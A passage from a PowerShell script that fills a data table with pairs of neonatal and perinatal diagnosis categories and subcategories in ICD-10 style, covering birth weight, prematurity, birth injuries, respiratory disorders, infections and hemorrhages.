pregnancy","Newborn affected by other maternal circulatory and respiratory diseases") + $null = $DiagnosisList.Rows.Add("Newborn affected by maternal conditions that may be unrelated to present pregnancy","Newborn affected by maternal nutritional disorders") + $null = $DiagnosisList.Rows.Add("Newborn affected by maternal conditions that may be unrelated to present pregnancy","Newborn affected by maternal injury") + $null = $DiagnosisList.Rows.Add("Newborn affected by maternal conditions that may be unrelated to present pregnancy","Newborn affected by surgical procedure on mother") + $null = $DiagnosisList.Rows.Add("Newborn affected by maternal conditions that may be unrelated to present pregnancy","Newborn affected by other medical procedures on mother, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Newborn affected by other maternal conditions","Newborn affected by periodontal disease in mother") + $null = $DiagnosisList.Rows.Add("Newborn affected by other maternal conditions","Newborn affected by other maternal conditions") + $null = $DiagnosisList.Rows.Add("Newborn affected by unspecified maternal condition","Newborn affected by unspecified maternal condition") + $null = $DiagnosisList.Rows.Add("Newborn affected by maternal complications of pregnancy","Newborn affected by incompetent cervix") + $null = $DiagnosisList.Rows.Add("Newborn affected by maternal complications of pregnancy","Newborn affected by premature rupture of membranes") + $null = $DiagnosisList.Rows.Add("Newborn affected by maternal complications of pregnancy","Newborn affected by oligohydramnios") + $null = $DiagnosisList.Rows.Add("Newborn affected by maternal complications of pregnancy","Newborn affected by polyhydramnios") + $null = $DiagnosisList.Rows.Add("Newborn affected by maternal complications of pregnancy","Newborn affected by ectopic pregnancy") + $null = $DiagnosisList.Rows.Add("Newborn affected by maternal complications of pregnancy","Newborn affected by multiple pregnancy") + $null = $DiagnosisList.Rows.Add("Newborn affected by maternal complications of pregnancy","Newborn affected by maternal death") + $null = $DiagnosisList.Rows.Add("Newborn affected by maternal complications of pregnancy","Newborn affected by malpresentation before labor") + $null = $DiagnosisList.Rows.Add("Newborn affected by maternal complications of pregnancy","Newborn affected by other maternal complications of pregnancy") + $null = $DiagnosisList.Rows.Add("Newborn affected by maternal complications of pregnancy","Newborn affected by maternal complication of pregnancy, unspecified") + $null = $DiagnosisList.Rows.Add("Newborn affected by complications of placenta, cord and membranes","Newborn affected by placenta previa") + $null = $DiagnosisList.Rows.Add("Newborn affected by complications of placenta, cord and membranes","Newborn affected by other forms of placental separation and hemorrhage") + $null = $DiagnosisList.Rows.Add("Newborn affected by other and unspecified morphological and functional abnormalities of placenta","Newborn affected by unspecified morphological and functional abnormalities of placenta") + $null = $DiagnosisList.Rows.Add("Newborn affected by other and unspecified morphological and functional abnormalities of placenta","Newborn affected by other morphological and functional abnormalities of placenta") + $null = $DiagnosisList.Rows.Add("Newborn affected by placental transfusion syndromes","Newborn affected by placental transfusion syndromes") + $null = $DiagnosisList.Rows.Add("Newborn affected by prolapsed cord","Newborn affected by prolapsed cord") + $null = $DiagnosisList.Rows.Add("Newborn affected by other compression of umbilical cord","Newborn affected by other compression of umbilical cord") + $null = $DiagnosisList.Rows.Add("Newborn affected by other and unspecified conditions of umbilical cord","Newborn affected by unspecified conditions of umbilical cord") + $null = $DiagnosisList.Rows.Add("Newborn affected by other and unspecified conditions of umbilical cord","Newborn affected by other conditions of umbilical cord") + $null = $DiagnosisList.Rows.Add("Newborn affected by chorioamnionitis","Newborn affected by chorioamnionitis") + $null = $DiagnosisList.Rows.Add("Newborn affected by other abnormalities of membranes","Newborn affected by other abnormalities of membranes") + $null = $DiagnosisList.Rows.Add("Newborn affected by abnormality of membranes, unspecified","Newborn affected by abnormality of membranes, unspecified") + $null = $DiagnosisList.Rows.Add("Newborn affected by other complications of labor and delivery","Newborn affected by breech delivery and extraction") + $null = $DiagnosisList.Rows.Add("Newborn affected by other complications of labor and delivery","Newborn affected by other malpresentation, malposition and disproportion during labor and delivery") + $null = $DiagnosisList.Rows.Add("Newborn affected by other complications of labor and delivery","Newborn affected by forceps delivery") + $null = $DiagnosisList.Rows.Add("Newborn affected by other complications of labor and delivery","Newborn affected by delivery by vacuum extractor [ventouse]") + $null = $DiagnosisList.Rows.Add("Newborn affected by other complications of labor and delivery","Newborn affected by Cesarean delivery") + $null = $DiagnosisList.Rows.Add("Newborn affected by other complications of labor and delivery","Newborn affected by precipitate delivery") + $null = $DiagnosisList.Rows.Add("Newborn affected by other complications of labor and delivery","Newborn affected by abnormal uterine contractions") + $null = $DiagnosisList.Rows.Add("Newborn affected by abnormality in fetal (intrauterine) heart rate or rhythm","Newborn affected by abnormality in fetal (intrauterine) heart rate or rhythm before the onset of labor") + $null = $DiagnosisList.Rows.Add("Newborn affected by abnormality in fetal (intrauterine) heart rate or rhythm","Newborn affected by abnormality in fetal (intrauterine) heart rate or rhythm during labor") + $null = $DiagnosisList.Rows.Add("Newborn affected by abnormality in fetal (intrauterine) heart rate or rhythm","Newborn affected by abnormality in fetal (intrauterine) heart rate or rhythm, unspecified as to time of onset") + $null = $DiagnosisList.Rows.Add("Meconium passage during delivery","Meconium passage during delivery") + $null = $DiagnosisList.Rows.Add("Newborn affected by other specified complications of labor and delivery","Newborn affected by other specified complications of labor and delivery") + $null = $DiagnosisList.Rows.Add("Newborn affected by complication of labor and delivery, unspecified","Newborn affected by complication of labor and delivery, unspecified") + $null = $DiagnosisList.Rows.Add("Newborn affected by noxious substances transmitted via placenta or breast milk","Newborn affected by maternal anesthesia and analgesia in pregnancy, labor and delivery") + $null = $DiagnosisList.Rows.Add("Newborn affected by noxious substances transmitted via placenta or breast milk","Newborn affected by other maternal medication") + $null = $DiagnosisList.Rows.Add("Newborn affected by noxious substances transmitted via placenta or breast milk","Newborn affected by maternal use of tobacco") + $null = $DiagnosisList.Rows.Add("Newborn affected by noxious substances transmitted via placenta or breast milk","Newborn affected by maternal use of alcohol") + $null = $DiagnosisList.Rows.Add("Newborn affected by maternal use of drugs of addiction","Newborn affected by maternal use of cocaine") + $null = $DiagnosisList.Rows.Add("Newborn affected by maternal use of drugs of addiction","Newborn affected by maternal use of other drugs of addiction") + $null = $DiagnosisList.Rows.Add("Newborn affected by maternal use of nutritional chemical substances","Newborn affected by maternal use of nutritional chemical substances") + $null = $DiagnosisList.Rows.Add("Newborn affected by maternal exposure to environmental chemical substances","Newborn affected by maternal exposure to environmental chemical substances") + $null = $DiagnosisList.Rows.Add("Newborn affected by other maternal noxious substances","Newborn affected by other maternal noxious substances") + $null = $DiagnosisList.Rows.Add("Newborn affected by maternal noxious substance, unspecified","Newborn affected by maternal noxious substance, unspecified") + $null = $DiagnosisList.Rows.Add("Newborn light for gestational age","Newborn light for gestational age, unspecified weight") + $null = $DiagnosisList.Rows.Add("Newborn light for gestational age","Newborn light for gestational age, less than 500 grams") + $null = $DiagnosisList.Rows.Add("Newborn light for gestational age","Newborn light for gestational age, 500-749 grams") + $null = $DiagnosisList.Rows.Add("Newborn light for gestational age","Newborn light for gestational age, 750-999 grams") + $null = $DiagnosisList.Rows.Add("Newborn light for gestational age","Newborn light for gestational age, 1000-1249 grams") + $null = $DiagnosisList.Rows.Add("Newborn light for gestational age","Newborn light for gestational age, 1250-1499 grams") + $null = $DiagnosisList.Rows.Add("Newborn light for gestational age","Newborn light for gestational age, 1500-1749 grams") + $null = $DiagnosisList.Rows.Add("Newborn light for gestational age","Newborn light for gestational age, 1750-1999 grams") + $null = $DiagnosisList.Rows.Add("Newborn light for gestational age","Newborn light for gestational age, 2000-2499 grams") + $null = $DiagnosisList.Rows.Add("Newborn light for gestational age","Newborn light for gestational age, 2500 grams and over") + $null = $DiagnosisList.Rows.Add("Newborn small for gestational age","Newborn small for gestational age, unspecified weight") + $null = $DiagnosisList.Rows.Add("Newborn small for gestational age","Newborn small for gestational age, less than 500 grams") + $null = $DiagnosisList.Rows.Add("Newborn small for gestational age","Newborn small for gestational age, 500-749 grams") + $null = $DiagnosisList.Rows.Add("Newborn small for gestational age","Newborn small for gestational age, 750-999 grams") + $null = $DiagnosisList.Rows.Add("Newborn small for gestational age","Newborn small for gestational age, 1000-1249 grams") + $null = $DiagnosisList.Rows.Add("Newborn small for gestational age","Newborn small for gestational age, 1250-1499 grams") + $null = $DiagnosisList.Rows.Add("Newborn small for gestational age","Newborn small for gestational age, 1500-1749 grams") + $null = $DiagnosisList.Rows.Add("Newborn small for gestational age","Newborn small for gestational age, 1750-1999 grams") + $null = $DiagnosisList.Rows.Add("Newborn small for gestational age","Newborn small for gestational age, 2000-2499 grams") + $null = $DiagnosisList.Rows.Add("Newborn small for gestational age","Newborn small for gestational age, other") + $null = $DiagnosisList.Rows.Add("Newborn affected by fetal (intrauterine) malnutrition not light or small for gestational age","Newborn affected by fetal (intrauterine) malnutrition not light or small for gestational age") + $null = $DiagnosisList.Rows.Add("Newborn affected by slow intrauterine growth, unspecified","Newborn affected by slow intrauterine growth, unspecified") + $null = $DiagnosisList.Rows.Add("Extremely low birth weight newborn","Extremely low birth weight newborn, unspecified weight") + $null = $DiagnosisList.Rows.Add("Extremely low birth weight newborn","Extremely low birth weight newborn, less than 500 grams") + $null = $DiagnosisList.Rows.Add("Extremely low birth weight newborn","Extremely low birth weight newborn, 500-749 grams") + $null = $DiagnosisList.Rows.Add("Extremely low birth weight newborn","Extremely low birth weight newborn, 750-999 grams") + $null = $DiagnosisList.Rows.Add("Other low birth weight newborn","Other low birth weight newborn, unspecified weight") + $null = $DiagnosisList.Rows.Add("Other low birth weight newborn","Other low birth weight newborn, 1000-1249 grams") + $null = $DiagnosisList.Rows.Add("Other low birth weight newborn","Other low birth weight newborn, 1250-1499 grams") + $null = $DiagnosisList.Rows.Add("Other low birth weight newborn","Other low birth weight newborn, 1500-1749 grams") + $null = $DiagnosisList.Rows.Add("Other low birth weight newborn","Other low birth weight newborn, 1750-1999 grams") + $null = $DiagnosisList.Rows.Add("Other low birth weight newborn","Other low birth weight newborn, 2000-2499 grams") + $null = $DiagnosisList.Rows.Add("Extreme immaturity of newborn","Extreme immaturity of newborn, unspecified weeks of gestation") + $null = $DiagnosisList.Rows.Add("Extreme immaturity of newborn","Extreme immaturity of newborn, gestational age less than 23 completed weeks") + $null = $DiagnosisList.Rows.Add("Extreme immaturity of newborn","Extreme immaturity of newborn, gestational age 23 completed weeks") + $null = $DiagnosisList.Rows.Add("Extreme immaturity of newborn","Extreme immaturity of newborn, gestational age 24 completed weeks") + $null = $DiagnosisList.Rows.Add("Extreme immaturity of newborn","Extreme immaturity of newborn, gestational age 25 completed weeks") + $null = $DiagnosisList.Rows.Add("Extreme immaturity of newborn","Extreme immaturity of newborn, gestational age 26 completed weeks") + $null = $DiagnosisList.Rows.Add("Extreme immaturity of newborn","Extreme immaturity of newborn, gestational age 27 completed weeks") + $null = $DiagnosisList.Rows.Add("Preterm [premature] newborn [other]","Preterm newborn, unspecified weeks of gestation") + $null = $DiagnosisList.Rows.Add("Preterm [premature] newborn [other]","Preterm newborn, gestational age 28 completed weeks") + $null = $DiagnosisList.Rows.Add("Preterm [premature] newborn [other]","Preterm newborn, gestational age 29 completed weeks") + $null = $DiagnosisList.Rows.Add("Preterm [premature] newborn [other]","Preterm newborn, gestational age 30 completed weeks") + $null = $DiagnosisList.Rows.Add("Preterm [premature] newborn [other]","Preterm newborn, gestational age 31 completed weeks") + $null = $DiagnosisList.Rows.Add("Preterm [premature] newborn [other]","Preterm newborn, gestational age 32 completed weeks") + $null = $DiagnosisList.Rows.Add("Preterm [premature] newborn [other]","Preterm newborn, gestational age 33 completed weeks") + $null = $DiagnosisList.Rows.Add("Preterm [premature] newborn [other]","Preterm newborn, gestational age 34 completed weeks") + $null = $DiagnosisList.Rows.Add("Preterm [premature] newborn [other]","Preterm newborn, gestational age 35 completed weeks") + $null = $DiagnosisList.Rows.Add("Preterm [premature] newborn [other]","Preterm newborn, gestational age 36 completed weeks") + $null = $DiagnosisList.Rows.Add("Disorders of newborn related to long gestation and high birth weight","Exceptionally large newborn baby") + $null = $DiagnosisList.Rows.Add("Disorders of newborn related to long gestation and high birth weight","Other heavy for gestational age newborn") + $null = $DiagnosisList.Rows.Add("Late newborn, not heavy for gestational age","Post-term newborn") + $null = $DiagnosisList.Rows.Add("Late newborn, not heavy for gestational age","Prolonged gestation of newborn") + $null = $DiagnosisList.Rows.Add("Abnormal findings on neonatal screening","Abnormal findings on neonatal screening") + $null = $DiagnosisList.Rows.Add("Intracranial laceration and hemorrhage due to birth injury","Subdural hemorrhage due to birth injury") + $null = $DiagnosisList.Rows.Add("Intracranial laceration and hemorrhage due to birth injury","Cerebral hemorrhage due to birth injury") + $null = $DiagnosisList.Rows.Add("Intracranial laceration and hemorrhage due to birth injury","Intraventricular hemorrhage due to birth injury") + $null = $DiagnosisList.Rows.Add("Intracranial laceration and hemorrhage due to birth injury","Subarachnoid hemorrhage due to birth injury") + $null = $DiagnosisList.Rows.Add("Intracranial laceration and hemorrhage due to birth injury","Tentorial tear due to birth injury") + $null = $DiagnosisList.Rows.Add("Intracranial laceration and hemorrhage due to birth injury","Other intracranial lacerations and hemorrhages due to birth injury") + $null = $DiagnosisList.Rows.Add("Intracranial laceration and hemorrhage due to birth injury","Unspecified intracranial laceration and hemorrhage due to birth injury") + $null = $DiagnosisList.Rows.Add("Other birth injuries to central nervous system","Cerebral edema due to birth injury") + $null = $DiagnosisList.Rows.Add("Other birth injuries to central nervous system","Other specified brain damage due to birth injury") + $null = $DiagnosisList.Rows.Add("Other birth injuries to central nervous system","Unspecified brain damage due to birth injury") + $null = $DiagnosisList.Rows.Add("Other birth injuries to central nervous system","Birth injury to facial nerve") + $null = $DiagnosisList.Rows.Add("Other birth injuries to central nervous system","Birth injury to other cranial nerves") + $null = $DiagnosisList.Rows.Add("Other birth injuries to central nervous system","Birth injury to spine and spinal cord") + $null = $DiagnosisList.Rows.Add("Other birth injuries to central nervous system","Birth injury to central nervous system, unspecified") + $null = $DiagnosisList.Rows.Add("Birth injury to scalp","Cephalhematoma due to birth injury") + $null = $DiagnosisList.Rows.Add("Birth injury to scalp","Chignon (from vacuum extraction) due to birth injury") + $null = $DiagnosisList.Rows.Add("Birth injury to scalp","Epicranial subaponeurotic hemorrhage due to birth injury") + $null = $DiagnosisList.Rows.Add("Birth injury to scalp","Bruising of scalp due to birth injury") + $null = $DiagnosisList.Rows.Add("Birth injury to scalp","Injury of scalp of newborn due to monitoring equipment") + $null = $DiagnosisList.Rows.Add("Other birth injuries to scalp","Caput succedaneum") + $null = $DiagnosisList.Rows.Add("Other birth injuries to scalp","Other birth injuries to scalp") + $null = $DiagnosisList.Rows.Add("Birth injury to scalp, unspecified","Birth injury to scalp, unspecified") + $null = $DiagnosisList.Rows.Add("Birth injury to skeleton","Fracture of skull due to birth injury") + $null = $DiagnosisList.Rows.Add("Birth injury to skeleton","Other birth injuries to skull") + $null = $DiagnosisList.Rows.Add("Birth injury to skeleton","Birth injury to femur") + $null = $DiagnosisList.Rows.Add("Birth injury to skeleton","Birth injury to other long bones") + $null = $DiagnosisList.Rows.Add("Birth injury to skeleton","Fracture of clavicle due to birth injury") + $null = $DiagnosisList.Rows.Add("Birth injury to skeleton","Birth injuries to other parts of skeleton") + $null = $DiagnosisList.Rows.Add("Birth injury to skeleton","Birth injury to skeleton, unspecified") + $null = $DiagnosisList.Rows.Add("Birth injury to peripheral nervous system","Erb's paralysis due to birth injury") + $null = $DiagnosisList.Rows.Add("Birth injury to peripheral nervous system","Klumpke's paralysis due to birth injury") + $null = $DiagnosisList.Rows.Add("Birth injury to peripheral nervous system","Phrenic nerve paralysis due to birth injury") + $null = $DiagnosisList.Rows.Add("Birth injury to peripheral nervous system","Other brachial plexus birth injuries") + $null = $DiagnosisList.Rows.Add("Birth injury to peripheral nervous system","Birth injuries to other parts of peripheral nervous system") + $null = $DiagnosisList.Rows.Add("Birth injury to peripheral nervous system","Birth injury to peripheral nervous system, unspecified") + $null = $DiagnosisList.Rows.Add("Other birth injuries","Birth injury to liver") + $null = $DiagnosisList.Rows.Add("Other birth injuries","Birth injury to spleen") + $null = $DiagnosisList.Rows.Add("Other birth injuries","Sternomastoid injury due to birth injury") + $null = $DiagnosisList.Rows.Add("Other birth injuries","Birth injury to eye") + $null = $DiagnosisList.Rows.Add("Other birth injuries","Birth injury to face") + $null = $DiagnosisList.Rows.Add("Other birth injuries","Birth injury to external genitalia") + $null = $DiagnosisList.Rows.Add("Other birth injuries","Subcutaneous fat necrosis due to birth injury") + $null = $DiagnosisList.Rows.Add("Other birth injuries","Other specified birth injuries") + $null = $DiagnosisList.Rows.Add("Other birth injuries","Birth injury, unspecified") + $null = $DiagnosisList.Rows.Add("Metabolic acidemia in newborn","Metabolic acidemia in newborn first noted before onset of labor") + $null = $DiagnosisList.Rows.Add("Metabolic acidemia in newborn","Metabolic acidemia in newborn first noted during labor") + $null = $DiagnosisList.Rows.Add("Metabolic acidemia in newborn","Metabolic acidemia noted at birth") + $null = $DiagnosisList.Rows.Add("Metabolic acidemia in newborn","Metabolic acidemia, unspecified") + $null = $DiagnosisList.Rows.Add("Respiratory distress of newborn","Respiratory distress syndrome of newborn") + $null = $DiagnosisList.Rows.Add("Respiratory distress of newborn","Transient tachypnea of newborn") + $null = $DiagnosisList.Rows.Add("Respiratory distress of newborn","Other respiratory distress of newborn") + $null = $DiagnosisList.Rows.Add("Respiratory distress of newborn","Respiratory distress of newborn, unspecified") + $null = $DiagnosisList.Rows.Add("Congenital pneumonia","Congenital pneumonia due to viral agent") + $null = $DiagnosisList.Rows.Add("Congenital pneumonia","Congenital pneumonia due to Chlamydia") + $null = $DiagnosisList.Rows.Add("Congenital pneumonia","Congenital pneumonia due to staphylococcus") + $null = $DiagnosisList.Rows.Add("Congenital pneumonia","Congenital pneumonia due to streptococcus, group B") + $null = $DiagnosisList.Rows.Add("Congenital pneumonia","Congenital pneumonia due to Escherichia coli") + $null = $DiagnosisList.Rows.Add("Congenital pneumonia","Congenital pneumonia due to Pseudomonas") + $null = $DiagnosisList.Rows.Add("Congenital pneumonia","Congenital pneumonia due to other bacterial agents") + $null = $DiagnosisList.Rows.Add("Congenital pneumonia","Congenital pneumonia due to other organisms") + $null = $DiagnosisList.Rows.Add("Congenital pneumonia","Congenital pneumonia, unspecified") + $null = $DiagnosisList.Rows.Add("Meconium aspiration","Meconium aspiration without respiratory symptoms") + $null = $DiagnosisList.Rows.Add("Meconium aspiration","Meconium aspiration with respiratory symptoms") + $null = $DiagnosisList.Rows.Add("Neonatal aspiration of (clear) amniotic fluid and mucus","Neonatal aspiration of (clear) amniotic fluid and mucus without respiratory symptoms") + $null = $DiagnosisList.Rows.Add("Neonatal aspiration of (clear) amniotic fluid and mucus","Neonatal aspiration of (clear) amniotic fluid and mucus with respiratory symptoms") + $null = $DiagnosisList.Rows.Add("Neonatal aspiration of blood","Neonatal aspiration of blood without respiratory symptoms") + $null = $DiagnosisList.Rows.Add("Neonatal aspiration of blood","Neonatal aspiration of blood with respiratory symptoms") + $null = $DiagnosisList.Rows.Add("Neonatal aspiration of milk and regurgitated food","Neonatal aspiration of milk and regurgitated food without respiratory symptoms") + $null = $DiagnosisList.Rows.Add("Neonatal aspiration of milk and regurgitated food","Neonatal aspiration of milk and regurgitated food with respiratory symptoms") + $null = $DiagnosisList.Rows.Add("Other neonatal aspiration","Other neonatal aspiration without respiratory symptoms") + $null = $DiagnosisList.Rows.Add("Other neonatal aspiration","Other neonatal aspiration with respiratory symptoms") + $null = $DiagnosisList.Rows.Add("Neonatal aspiration, unspecified","Neonatal aspiration, unspecified") + $null = $DiagnosisList.Rows.Add("Interstitial emphysema and related conditions originating in the perinatal period","Interstitial emphysema originating in the perinatal period") + $null = $DiagnosisList.Rows.Add("Interstitial emphysema and related conditions originating in the perinatal period","Pneumothorax originating in the perinatal period") + $null = $DiagnosisList.Rows.Add("Interstitial emphysema and related conditions originating in the perinatal period","Pneumomediastinum originating in the perinatal period") + $null = $DiagnosisList.Rows.Add("Interstitial emphysema and related conditions originating in the perinatal period","Pneumopericardium originating in the perinatal period") + $null = $DiagnosisList.Rows.Add("Interstitial emphysema and related conditions originating in the perinatal period","Other conditions related to interstitial emphysema originating in the perinatal period") + $null = $DiagnosisList.Rows.Add("Pulmonary hemorrhage originating in the perinatal period","Tracheobronchial hemorrhage originating in the perinatal period") + $null = $DiagnosisList.Rows.Add("Pulmonary hemorrhage originating in the perinatal period","Massive pulmonary hemorrhage originating in the perinatal period") + $null = $DiagnosisList.Rows.Add("Pulmonary hemorrhage originating in the perinatal period","Other pulmonary hemorrhages originating in the perinatal period") + $null = $DiagnosisList.Rows.Add("Pulmonary hemorrhage originating in the perinatal period","Unspecified pulmonary hemorrhage originating in the perinatal period") + $null = $DiagnosisList.Rows.Add("Chronic respiratory disease originating in the perinatal period","Wilson-Mikity syndrome") + $null = $DiagnosisList.Rows.Add("Chronic respiratory disease originating in the perinatal period","Bronchopulmonary dysplasia originating in the perinatal period") + $null = $DiagnosisList.Rows.Add("Chronic respiratory disease originating in the perinatal period","Other chronic respiratory diseases originating in the perinatal period") + $null = $DiagnosisList.Rows.Add("Chronic respiratory disease originating in the perinatal period","Unspecified chronic respiratory disease originating in the perinatal period") + $null = $DiagnosisList.Rows.Add("Other respiratory conditions originating in the perinatal period","Primary atelectasis of newborn") + $null = $DiagnosisList.Rows.Add("Other and unspecified atelectasis of newborn","Unspecified atelectasis of newborn") + $null = $DiagnosisList.Rows.Add("Other and unspecified atelectasis of newborn","Resorption atelectasis without respiratory distress syndrome") + $null = $DiagnosisList.Rows.Add("Other and unspecified atelectasis of newborn","Other atelectasis of newborn") + $null = $DiagnosisList.Rows.Add("Cyanotic attacks of newborn","Cyanotic attacks of newborn") + $null = $DiagnosisList.Rows.Add("Primary sleep apnea of newborn","Primary sleep apnea of newborn") + $null = $DiagnosisList.Rows.Add("Other apnea of newborn","Other apnea of newborn") + $null = $DiagnosisList.Rows.Add("Respiratory failure of newborn","Respiratory failure of newborn") + $null = $DiagnosisList.Rows.Add("Other specified respiratory conditions of newborn","Respiratory arrest of newborn") + $null = $DiagnosisList.Rows.Add("Other specified respiratory conditions of newborn","Other specified respiratory conditions of newborn") + $null = $DiagnosisList.Rows.Add("Respiratory condition of newborn, unspecified","Respiratory condition of newborn, unspecified") + $null = $DiagnosisList.Rows.Add("Cardiovascular disorders originating in the perinatal period","Neonatal cardiac failure") + $null = $DiagnosisList.Rows.Add("Neonatal cardiac dysrhythmia","Neonatal tachycardia") + $null = $DiagnosisList.Rows.Add("Neonatal cardiac dysrhythmia","Neonatal bradycardia") + $null = $DiagnosisList.Rows.Add("Neonatal hypertension","Neonatal hypertension") + $null = $DiagnosisList.Rows.Add("Persistent fetal circulation","Pulmonary hypertension of newborn") + $null = $DiagnosisList.Rows.Add("Persistent fetal circulation","Other persistent fetal circulation") + $null = $DiagnosisList.Rows.Add("Transient myocardial ischemia in newborn","Transient myocardial ischemia in newborn") + $null = $DiagnosisList.Rows.Add("Other cardiovascular disorders originating in the perinatal period","Cardiac arrest of newborn") + $null = $DiagnosisList.Rows.Add("Other cardiovascular disorders originating in the perinatal period","Other cardiovascular disorders originating in the perinatal period") + $null = $DiagnosisList.Rows.Add("Cardiovascular disorder originating in the perinatal period, unspecified","Cardiovascular disorder originating in the perinatal period, unspecified") + $null = $DiagnosisList.Rows.Add("Congenital viral diseases","Congenital rubella syndrome") + $null = $DiagnosisList.Rows.Add("Congenital viral diseases","Congenital cytomegalovirus infection") + $null = $DiagnosisList.Rows.Add("Congenital viral diseases","Congenital herpesviral [herpes simplex] infection") + $null = $DiagnosisList.Rows.Add("Congenital viral diseases","Congenital viral hepatitis") + $null = $DiagnosisList.Rows.Add("Congenital viral diseases","Other congenital viral diseases") + $null = $DiagnosisList.Rows.Add("Congenital viral diseases","Congenital viral disease, unspecified") + $null = $DiagnosisList.Rows.Add("Bacterial sepsis of newborn","Sepsis of newborn due to streptococcus, group B") + $null = $DiagnosisList.Rows.Add("Sepsis of newborn due to other and unspecified streptococci","Sepsis of newborn due to unspecified streptococci") + $null = $DiagnosisList.Rows.Add("Sepsis of newborn due to other and unspecified streptococci","Sepsis of newborn due to other streptococci") + $null = $DiagnosisList.Rows.Add("Sepsis of newborn due to Staphylococcus aureus","Sepsis of newborn due to Staphylococcus aureus") + $null = $DiagnosisList.Rows.Add("Sepsis of newborn due to other and unspecified staphylococci","Sepsis of newborn due to unspecified staphylococci") + $null = $DiagnosisList.Rows.Add("Sepsis of newborn due to other and unspecified staphylococci","Sepsis of newborn due to other staphylococci") + $null = $DiagnosisList.Rows.Add("Sepsis of newborn due to Escherichia coli","Sepsis of newborn due to Escherichia coli") + $null = $DiagnosisList.Rows.Add("Sepsis of newborn due to anaerobes","Sepsis of newborn due to anaerobes") + $null = $DiagnosisList.Rows.Add("Other bacterial sepsis of newborn","Other bacterial sepsis of newborn") + $null = $DiagnosisList.Rows.Add("Bacterial sepsis of newborn, unspecified","Bacterial sepsis of newborn, unspecified") + $null = $DiagnosisList.Rows.Add("Other congenital infectious and parasitic diseases","Congenital tuberculosis") + $null = $DiagnosisList.Rows.Add("Other congenital infectious and parasitic diseases","Congenital toxoplasmosis") + $null = $DiagnosisList.Rows.Add("Other congenital infectious and parasitic diseases","Neonatal (disseminated) listeriosis") + $null = $DiagnosisList.Rows.Add("Other congenital infectious and parasitic diseases","Congenital falciparum malaria") + $null = $DiagnosisList.Rows.Add("Other congenital infectious and parasitic diseases","Other congenital malaria") + $null = $DiagnosisList.Rows.Add("Other congenital infectious and parasitic diseases","Neonatal candidiasis") + $null = $DiagnosisList.Rows.Add("Other congenital infectious and parasitic diseases","Other specified congenital infectious and parasitic diseases") + $null = $DiagnosisList.Rows.Add("Other congenital infectious and parasitic diseases","Congenital infectious or parasitic disease, unspecified") + $null = $DiagnosisList.Rows.Add("Omphalitis of newborn","Omphalitis with mild hemorrhage") + $null = $DiagnosisList.Rows.Add("Omphalitis of newborn","Omphalitis without hemorrhage") + $null = $DiagnosisList.Rows.Add("Other infections specific to the perinatal period","Neonatal infective mastitis") + $null = $DiagnosisList.Rows.Add("Other infections specific to the perinatal period","Neonatal conjunctivitis and dacryocystitis") + $null = $DiagnosisList.Rows.Add("Other infections specific to the perinatal period","Intra-amniotic infection affecting newborn, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other infections specific to the perinatal period","Neonatal urinary tract infection") + $null = $DiagnosisList.Rows.Add("Other infections specific to the perinatal period","Neonatal skin infection") + $null = $DiagnosisList.Rows.Add("Other infections specific to the perinatal period","Other specified infections specific to the perinatal period") + $null = $DiagnosisList.Rows.Add("Other infections specific to the perinatal period","Infection specific to the perinatal period, unspecified") + $null = $DiagnosisList.Rows.Add("Newborn affected by intrauterine (fetal) blood loss","Newborn affected by intrauterine (fetal) blood loss from vasa previa") + $null = $DiagnosisList.Rows.Add("Newborn affected by intrauterine (fetal) blood loss","Newborn affected by intrauterine (fetal) blood loss from ruptured cord") + $null = $DiagnosisList.Rows.Add("Newborn affected by intrauterine (fetal) blood loss","Newborn affected by intrauterine (fetal) blood loss from placenta") + $null = $DiagnosisList.Rows.Add("Newborn affected by intrauterine (fetal) blood loss","Newborn affected by hemorrhage into co-twin") + $null = $DiagnosisList.Rows.Add("Newborn affected by intrauterine (fetal) blood loss","Newborn affected by hemorrhage into maternal circulation") + $null = $DiagnosisList.Rows.Add("Newborn affected by intrauterine (fetal) blood loss","Newborn affected by intrauterine (fetal) blood loss from cut end of co-twin's cord") + $null = $DiagnosisList.Rows.Add("Newborn affected by intrauterine (fetal) blood loss","Newborn affected by other intrauterine (fetal) blood loss") + $null = $DiagnosisList.Rows.Add("Newborn affected by intrauterine (fetal) blood loss","Newborn affected by intrauterine (fetal) blood loss, unspecified") + $null = $DiagnosisList.Rows.Add("Umbilical hemorrhage of newborn","Massive umbilical hemorrhage of newborn") + $null = $DiagnosisList.Rows.Add("Umbilical hemorrhage of newborn","Other umbilical hemorrhages of newborn") + $null = $DiagnosisList.Rows.Add("Umbilical hemorrhage of newborn","Umbilical hemorrhage of newborn, unspecified") + $null = $DiagnosisList.Rows.Add("Intracranial nontraumatic hemorrhage of newborn","Intraventricular (nontraumatic) hemorrhage, grade 1, of newborn") + $null = $DiagnosisList.Rows.Add("Intracranial nontraumatic hemorrhage of newborn","Intraventricular (nontraumatic) hemorrhage, grade 2, of newborn") + $null = $DiagnosisList.Rows.Add("Intraventricular (nontraumatic) hemorrhage, grade 3 and grade 4, of newborn","Intraventricular (nontraumatic) hemorrhage, grade 3, of newborn") + $null = $DiagnosisList.Rows.Add("Intraventricular (nontraumatic) hemorrhage, grade 3 and grade 4, of newborn","Intraventricular (nontraumatic) hemorrhage, grade 4, of newborn") + $null = $DiagnosisList.Rows.Add("Unspecified intraventricular (nontraumatic) hemorrhage of newborn","Unspecified intraventricular (nontraumatic) hemorrhage of newborn") + $null = $DiagnosisList.Rows.Add("Intracerebral (nontraumatic) hemorrhage of newborn","Intracerebral (nontraumatic) hemorrhage of newborn") + $null = $DiagnosisList.Rows.Add("Subarachnoid (nontraumatic) hemorrhage of newborn","Subarachnoid (nontraumatic) hemorrhage of newborn") + $null = $DiagnosisList.Rows.Add("Cerebellar (nontraumatic) and posterior fossa hemorrhage of newborn","Cerebellar (nontraumatic) and posterior fossa hemorrhage of newborn") + $null = $DiagnosisList.Rows.Add("Other intracranial (nontraumatic) hemorrhages of newborn","Other intracranial (nontraumatic) hemorrhages of newborn") + $null = $DiagnosisList.Rows.Add("Intracranial (nontraumatic) hemorrhage of newborn, unspecified","Intracranial (nontraumatic) hemorrhage of newborn, unspecified") + $null = $DiagnosisList.Rows.Add("Hemorrhagic disease of newborn","Hemorrhagic disease of newborn") + $null = $DiagnosisList.Rows.Add("Other neonatal hemorrhages","Neonatal hematemesis") + $null = $DiagnosisList.Rows.Add("Other neonatal hemorrhages","Neonatal melena") + $null = $DiagnosisList.Rows.Add("Other neonatal hemorrhages","Neonatal rectal hemorrhage") + $null = 